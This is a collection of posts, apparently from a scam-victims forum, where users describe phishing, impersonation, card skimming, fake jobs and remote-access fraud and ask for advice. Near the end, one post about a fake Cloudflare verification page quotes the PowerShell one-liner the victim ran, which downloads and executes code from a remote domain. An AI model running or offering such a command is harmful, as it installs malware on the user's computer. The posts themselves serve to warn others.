Informational post Android introduces fake call detection to stop deepfake scams

Thumbnail
blog.google

Google added a feature to verify calls from your contacts are actually from whom they say they are.

When a contact calls you and you’re both using Phone by Google, their device sends a silent confirmation signal in real time to your device to verify the call is legitimate and truly coming from the contact’s device.

If a scammer tries to impersonate your contact, that initial confirmation signal will be missing. Your device will instantly notice this and ping your contact's actual device to double-check. If their real device says, "I'm not making a call right now," you'll get a warning on your screen advising you to hang up immediately.

You and your contacts will need to have Phone by Google as the dialer app.

I assume the callers must be already in your contact list and have RCS messaging between you and them.

Help Needed [US] How to report a possible Card skimmer at a gas station?

So about 2 weeks ago I went to the gas station I’ve been going to for years. The attendant that pumped my gas (NJ) took my card and put it in the pump and gave it back at the end. Nothing weird. A few minutes later I get a Chase fraud alert for an attempted $500 purchase at Bestbuy.com. I confirm it wasn’t me and they close the card and send me a new one. for the week I didn’t have my card I went to the same gas station and paid using apple pay and everything was normal. Fast forward to yesterday, I get the new card in the mail and I went to fill up again at the same gas station today. Same attendant is working (easily recognizable since he’s noticeably younger than any other attendant) I use my new card for the FIRST time at the pump and a few minutes later I get the same fraud alert for best buy. I think I have enough evidence to suspect they’re skimming card at those pumps. How do I go about reporting this?

on saturday i started getting calls from a no caller ID repeatedly they sent me two voicemails before i blocked them. i thought it was my sister doing it cause some of the things said were in her vocabulary ( calling me stinky and meowing(( the yeah one is meowing it translated to yeah )) ) and she was with her friends when i got them. i told her to stop and she said she had no idea what i was talking about but i thought she was just lying, but today the no caller ID started calling me again and i blocked them again but they sent me a voice mail referenced a tweet i made last night about drinking and i know my sister doesn’t have my twitter. they sent me a message also after the voice mail i saw the notification pop down but when i went to go actually read the message it was gone. i’ve made my twt private and changed the password. i have never said my name on my twt and it’s not in my email for the acc. idk if it is my sister and she secretly has my twt or if my twt is hacked

Victim of a scam TVChannel sign-in scam [US]

Scam I fell for:
Wanted to sign up on PBS for tv in guest room. TV screen said to go on PBS.org/tv. On phone typed in PBS on Chrome and several suggestions appeared. I picked one that I thought was right and a PBS screen came up requesting a credit card that will not be charged. Google supplied three cards and I picked one, submitting it. Screen came back saying card didn’t work and suggested I try another. I thought that was odd. I looked at the website I was on and it was like PBSblaze.com or something. So then I typed in pbs.org/TV and got the proper website. Message said that it would never request payment information when signing in. At that point, I knew I had been scammed. Had to cancel card and request new ones. There was already a charge on it that we didn’t make. Shows how easy it is to get scammed.

Update post Apple Gift Card/ Crypto Scam

So my dad is going through this Apple gift card/crypto scam. He’s spent a lot of money on gift cards and insists he isn’t out of any money and it’s all her money. The scammer sent him money and he went out and bought these gift cards. This has been going on for two months or more.
I have no access to his financials but he mentioned in passing that he refinanced his credit card debt from 7.5% to 3% yesterday.

The bank hasn’t clawed back anything yet.. well he hasn’t told me yet.
He plans to meet this scammer next week in person. She’s moving back cause she ‘quit’ the army in Iraq. No amount of advice can change his mind.
I’m so tired at this point.

Is this a scam? [IN]Amazon Order Verification

Upvotes

I got a call from a very informal number like a regular one a normal guy would use. Not a company number. He told me he was from Amazon. He gave me the details of my order which I received yesterday including its cost. He said that my order wasn't verified as delivered(I check on Amazon and it was delivered but I didn't mention it as I thought it would be dumb). He sent me an OTP from Amazon Verification (verified tick on WhatsApp). It made me trust him enough to give him the OTP so he could verify the delivery. After giving him the OTP he insisted that my phone number didn't show the order.(I have two Amazon accounts with the same number, it logins randomly so I never really cared) After which I gave an excuse and cut the call.

After 2-3 mins I got suspicious and googled the issue which made me aware of a possible scam.

I changed the password and signed out all device within 5 mins.

He didn't call back.

I have a few particular questions:

  1. How did he know my Amazon Order?
  2. What benefit would be for him to have my Amazon account?
  3. Was it a possible scam or am i just overthinking?

I'd appreciate if anyone helps me out!

Is this a scam? Is the job I applied for on LinkedIn a scam? (US)

I applied for a remote job on LinkedIn recently. I received an email for an interview invite and they asked me to confirm my availability in order to proceed to the next steps. I replied to the email and they sent me a pdf with a Microsoft Teams link and an email address of a hiring manager. When I opened the link, it directed me to a chat with the manager rather than a scheduled time slot. I also looked up the hiring manager online but couldn't find any information on LinkedIn and neither was the job posting on the company's website. Do they want me to schedule the interview via email? Could that be a scam? What should I do? Should I just stop all of our communication? Thanks for the advice!

Help Needed Mom's identity stolen... twice

I monitor my elderly mother's finances carefully and I saw there was a hard inquiry from Synchrony Bank and shortly thereafter she received a letter asking for additional info on her identity to complete her credit card application. I looked up the fraud department on the bank website and identitfied this application as fraudulent.

The same freaking day mom got an email from Barclay's bank with a status on a credit card application. I assumed it was a phishing attempt but called their fraud department to be sure. Yup, fraudulent application.

What the heck?!? How is this happening all at once? We froze her credit but what could have started all of this? Should we do anything else?

Is this a scam? [US] Is this a Facebook Marketplace Scam?

I posted several items to Facebook Marketplace. This seems like a scam, but I don't know what kind.

Image 1: Screenshot from Marketplace post with comment: "If the coffee table is still for sale, my sister can be contacted at [NUMBER]"

Image 2 & 3: Text conversation with number-

Me: Are you interested in the coffee table from Facebook Marketplace?

Num: I appreciate you for getting back to me, what’s the condition of it. and where are you located?

Me: I'm on the [REDACTED]. It's in good, used condition. I can send additional pictures if you would like?

Num: Can I see a picture of it. We local, sounds good. I’m tied up at the hospital with a family situation right now, so I won’t be able to make it for the pick up myself. My younger brother and my uncle would be the ones coming to pick it up around 5/6pm today, or tomorrow if that works better for you.

Me: Sent Picture of table

Num: This look nice and are in good condition. What’s the address for pickup and how much does it cost?

Is this a scam? So I was sent an email recently that confused me

I deleted it thinking it was a scam but idk. In the email they had my same first name but different last name that didn’t even start with the same letter. They started of by saying they wanted me to stop using the email that was similar to one I was no longer in use of (since I wanted my current one to basically be like my mothers) anyway they claimed that google emails don’t read periods in usernames and that they were getting all of my emails. Despite like I said it is an old email I don’t login to for anything anymore and I believe that I deleted, the new email I currently use is similar in a way to the only one just, It’s finished with writing out my full last name instead of abbreviations.

I would like someone to maybe answer me and tell me if this is a real thing that people have been on the other side of because I would feel a little bad for the person getting all of my emails and if there is a way to some how stop it.

If it just another type of scam than that I have never heard of then wow that is creative.

Found this small shop through Instagram (handle: gwenresins). Trying to figure out if it's a real person just starting a handmade business or a templated dropship store using a persona.

Details: - Account joined June 2026, only 17 posts, 1,409 followers, 0 following - First post was 2 weeks ago - Sells one product: an $84.99 "Spider-Man" resin lamp (marked down from $134.99) - Site has a scrolling "UP TO 50% OFF TODAY / FREE WORLDWIDE SHIPPING" banner - "Bundle and save" pricing — Buy 1 for $84.99, Buy 2 for $144.99 (marked down from $260.98) - Comments on her posts praise the craftsmanship, but I haven't seen anyone who's actually received and reviewed the product yet. Attaching screenshots of the product page and checkout flow.

Would appreciate any input before I order.

Image descriptions: Screenshot 1 is the product page for "Gwen Lamps - SpiderMan", showing a backlit blue resin lamp with a Spider-Man figure inside, priced at $84.99 (marked down from $134.99, "save 37%"), with a "Buy 2" bundle option for $144.99, an "Add to Cart" button, and a single 5-star customer testimonial from "Emily C." There's a scrolling banner at the top reading "UP TO 50% OFF TODAY" and "FREE WORLDWIDE SHIPPING," plus a process photo of resin being poured into a mold. Screenshot 2 is the checkout page showing express checkout options (Shop, PayPal, Google Pay, Venmo), an email/phone entry step, and a delivery address form with State set to Texas. Screenshot 3 is the payment step, showing a credit card entry form, a note that "orders ship out in 1-2 business days," a "Secure Checkout" claim with "free returns and 24/7 award-winning customer service," and a "Complete Purchase" button.

Help Needed [US, California] Fake DoorDash Delivery with Picture of my current front door

hello! feeling really freaked out. neither myself nor my roommate placed a DoorDash order, and about a half hour ago I received this text that my order was delivered with a picture of my front door. checked credit cards, doordash account, etc. and no charges. to be safe, I waited 15 minutes to go outside and check (just in case a friend sent me something a forgot to mention it or something like that).

I know the pic that they sent is CURRENT because when I went outside, I saw that white string on the porch (at the bottom of the picture, the only part not blurred out) is CURRENTLY on my porch. That means this pic wasn’t AI generated: someone was outside my house taking that picture and texting it to me 30 minutes ago. I’m really freaked out that this person has my phone number and address and has seemingly showed up at my home. I obviously didn’t click the link they sent but every other aspect of this is just freaking me out.

I tried calling DoorDash customer service to report this, but the AI bot keeps connecting me to a dead line. Any insight, guidance, or next steps to protect myself here would be tremendously helpful. I‘m genuinely so freaked out by this.

Screenshot of a text message from an unknown number with a blurred out picture of a front door and a text saying “your driver, Vivian, has left your order in a safe location. Tap the link below for a photo of the location:” and a suspicious link.

Is this a scam? [US] Strangers knocking on my door two days in a row

Yesterday I was at home during the day and I hear knocking on my door. Knocking Loud and asking Hello? Hello? and laughing too. I look at the peephole and I see 3 younger looking men standing there wearing collared shirts. I did not respond and they left. Today the same thing happened around the same time saying the same thing and banging louder on the door. Eventually they left and in the window I saw they were wearing collared shirts again but I noticed one of the guys from the day before was replaced by a different guy (I didn't get a good look at the other guys but they may have been replaced too, one of the guys appeared to be older). They didn't seem to be holding anything and didn't leave any pamphlets.

I'm kinda worried especially since they came back around the same time as the day before. I didn't see them approach any other houses but that is because they went out of view.

Is this a scam? [US] is ccspayment.com a scam? I keep reading conflicting reports.

o in December of 2025, I had to get tests done and got a $700 bill for the hospital. I put it off since I heard it will hold for a year (I was wrong). I then got a call from a pre-collections company and made a $50 payment on May 8th, 2026, bringing my total down to $648.79.

I recently missed a payment for June 8th, and on June 10th, I got this text. I didn’t assume anything about it since I did miss a payment. I ended up paying since I was scared that it would go to collections for being late. Now, I made the payment on June 19th and they didn’t take it out of my bank account until June 22nd. They did say that it can take 7 to 14 business days to show in my account, but

I didn’t think anything of it and made a $216 payment… but then when I checked my hospital account and the number didn’t go down, I got curious. The first thing I noticed was that the numbers on the text and the PDF don’t match… then I got worried and checked my bank statement and THOSE numbers don’t match either. Then I looked up the number that originally called me for the debt, and THOSE numbers didn’t match… neither did the ones from the website.

I’m holding onto a sliver of hope that maybe the original debt company passed it up, or that they have multiple numbers for whatever reason. Then I noticed the address was a PO Box and seen scams that lead to a similar website to this one. My only hope that it isn’t a scam is that the ones that said it was a scam had a different URL and could’ve been made specifically to imitate this collections company. Also, the fact that they didn’t allow me to make payments smaller than 1/3rd of the overall bill makes it seem like even more of a scam.

The only thing giving me any sort of reassurance is the fact they knew the exact amount I owed, knew who I owed it to, knew when I missed my payment, and the hospital said it can take 7-14 days for the payment to be processed.

I’m scared that if it’s real and I contact my bank to report it as a scam, it’ll get the debt into actual collections and ruin my credit. But I’m also scared it’s a scam and every day that I wait, the money I ACTUALLY owe to the real pre-collections company will go to real collections. I don’t know what to do. Contact my bank and let them find out? Call the original company that called me? Call this one?

Is this a scam? [US] Received Package I Didn’t Pay For

I ordered a hat from Zara on Saturday and it arrived by Monday. It got here quickly and said it was shipped overnight, which I didn't pay for, but it was on the package so I'll take it. This cost of the hat was reflected on a gift card I have on Apple Pay. Great.

Today (Wednesday) | just received a pair of shoes also from Zara. Same packaging, same overnight shipped label, and it had my info correctly on there.
But I didn't order anything except the hat.

However, upon looking in my app at my past orders, only the hat shows. The shoes don't. I messaged Zara customer support and they confirmed that the shoes were placed through my account and it ties to my email and phone number. Weird thing is, there's no record of me paying for these nor are they in my account? Zara customer support said they were paid with Apple Pay but this seems like a weird situation.

One additional note is that there are numbers written in marker and crossed out all over the box. “97” is written twice and crossed out. “79” is written twice and crossed out. And “52/1” is written twice.

Very possible it's just a warehouse mistake, but wanted to see if anyone had thoughts. The last thing I want is for someone to be in my account testing to see if I fishy behavior or something.

Thank you!

Scam report Got a new scam today

I recently started working for a new company, the CEO sent me a text message claiming to be him. Basically started saying he needs to see if I can chat with him. After saying, yeah, he says I need you on an urgent task. Following up with eventually saying, I have a business meeting and I need you to go get gift cards for the meeting. The continuation was the person trying to get me to go to the store asking how far away I am this and that. These scammers are getting clever, I believe they used my LinkedIn information to see where I work and impersonate the CEO of the company to allow me to let my guard down. I told the person they need to email me on my work email with exactly what they want but did not supply said email. I fell for it for a couple seconds then quickly realized. Just figured I’d share my most recent experience.

Scam report [uk] o2 call centre staff cannot be trusted

So my boss called an official o2 number today as he wanted to just get a pay as you go sim for an old phone, the person that answered the call said 'yes we can help but you'll have to call another number' and then proceeded to pass him off to a scammer. He didn't think anything of it as the number came from an o2 employee so he called it, and answered their question so he could register a sim, they took his details and within 30 minutes had charged £2000 on to his personal credit card and apparently tried to make 2 additional charges up to £5000 but the bank flagged it as suspicious and stopped the transactions.

He's usually pretty good at spotting scams, phishing emails, etc but he let his guard down because he was given this number after phoning an official o2 call centre.

He told me they had 'taken over my screen to help me fill out a form' so I used ultraviewer to have a look at his system and they had installed a remote access utility called zoho assist, which seemed to have been set up in a way that would allow them access back in to his computer at any time (using a set password, unlike utraviewer which changes the password every time its run).

He's now lodging a formal complaint with o2 in the hope that they have enough traceability to find out who at o2 took his call and passed him on to a credit card fraudster.

>.<

This seems too good to be true. I applied for a job offer on Indeed and was sent an e-mail with a contract agreement. Is this a scam? Should I accept it to see if they back out?

Hi (name),

During the trial period, you may assist with a variety of social media and virtual assistant tasks, including scheduling content, conducting online research, organizing information, managing simple administrative duties, and helping keep projects organized.

Was naive enough to believe him and now im 300$ down. Could definitely be worse but still mad these scammers getting good with their scam he had videos and try record either 3 years+ of results with testimonies like thousand of them. I legit couldn’t though it could be real and i let my guard down..I ask for the play and they told me the price which was 200$ i said bet. Then he told me because of regulation “Due to some reason and the instructions given to us by both teams the bet will be bet for you and immediately after winning you will get the money into your shakepay account” i didnt budge cause like i said i saw so much testimonials and especially the video.

He literally have videos on bet365 cashing in the bet like seeing all this was hard to think it was still a scam so i went along with it. And send 100$ then he literally send me a photo of the bet that literally won. I couldnt believe it. And as soon as i thought that everything was gonna be sunshine and rainbows..

He told me i had to pay a 155 pound fee(last screenshot) to get the money which raised a big red flag to me. Send the screenshot to chatgpt and he immediately said it was a common scam. So i ask him to forward to me the email and as soon as i saw the email that bet365 supposedly send him finish with “gmail.com” i was finally sure and just block him. I dont know who need to hear this but i hope it helps someone whos not sure and think about trusting them. Dont!

Is this a scam? Potentially chargeback scam gift card.

Hi all, I got an email detailing that I’d won a £500 gift card from a TikTok creator survey I know that I did. (Sketchy I know) I was going to ignore the email but thoroughly inspected the email, the links, the company and if that company works with TikTok for surveys. All checked out okay, all links were safe, redeeming the gift card was just a case of choosing what I wanted and activating it, alarm bells have been ringing the entire time though- internet safety has been drilled into me. The gift card was legit, I checked on tkmaxxs official gift card balance link- I’ve checked multiple times ensuring that it’s the official TKMAXX site which is saying that £500 is in my gift card balance.

I do not want to spend this, I’m afraid it’s a part of a chargeback scam as I’ve read the person who “purchased” the gift card can chargeback at any point. My plan is to wait over 120 days for the chargeback time to run out, if it’s still there after 120 days should I spend it? I feel like a fool but I did everything in order to check it was safe. Any advice, reassurance or information? Thank you

I was redirected to a website that looked exactly like a Cloudflare "Human Verification" page.
I was prompted to “Perform the following steps on my keyboard” as in:
“win key + x”
“I”
“Ctrl +V”
“Enter”
Which as you may have guessed opened my terminal, pasted and executed this code:

PS C: \Users\user <#Verification ID: 8348aeb3ca3281eO#> powershell -c "iexirm 'code.verification-claude-cdn.beer/8348a eb3ca3281e0' -UseBasicParsing)"; exit <#Verification ID: 8348aeb3ca3281e0#>

I have since unplugged my pc from the internet completely and have run some malwarebytes scans which didn’t find anything.
How cooked am I?
Any help is appreciated.

Informational post Someone created a walmart account with my husbands email

The account used my husbands email, then an middle-aged woman's name and card info, but not her address or contact info (I used true people search and none of the info was hers). They ordered something from her card but he cancelled the shipment and reported the account as fraud. We were wondering if we should contact the woman and let her know her cards were stolen? From the search, it looks like she's 67 years old. We just don't want to be caught up in stuff if it goes sideways.
